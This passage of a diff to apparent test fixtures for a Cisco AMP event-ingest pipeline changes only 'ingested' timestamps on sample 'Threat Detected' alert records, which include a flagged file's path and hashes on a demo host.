Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -118,7 +118,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337047700Z", + "ingested": "2021-12-14T14:40:41.774807190Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -202,7 +202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337053100Z", + "ingested": "2021-12-14T14:40:41.774807738Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -286,7 +286,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337059300Z", + "ingested": "2021-12-14T14:40:41.774808197Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -370,7 +370,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337064100Z", + "ingested": "2021-12-14T14:40:41.774808614Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -454,7 +454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337068900Z", + "ingested": "2021-12-14T14:40:41.774809125Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -538,7 +538,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337073Z", + "ingested": "2021-12-14T14:40:41.774809594Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -622,7 +622,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337077900Z", + "ingested": "2021-12-14T14:40:41.774810012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -706,7 +706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337084500Z", + "ingested": "2021-12-14T14:40:41.774810427Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -790,7 +790,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337089500Z", + "ingested": "2021-12-14T14:40:41.774810889Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -874,7 +874,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337095400Z", + "ingested": "2021-12-14T14:40:41.774811299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -958,7 +958,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337101500Z", + "ingested": "2021-12-14T14:40:41.774811946Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1042,7 +1042,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337107300Z", + "ingested": "2021-12-14T14:40:41.774812368Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1126,7 +1126,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337113Z", + "ingested": "2021-12-14T14:40:41.774812835Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1210,7 +1210,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337118800Z", + "ingested": "2021-12-14T14:40:41.774813252Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1294,7 +1294,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337124600Z", + "ingested": "2021-12-14T14:40:41.774813732Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -1378,7 +1378,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337130600Z", + "ingested": "2021-12-14T14:40:41.774814273Z", "original": 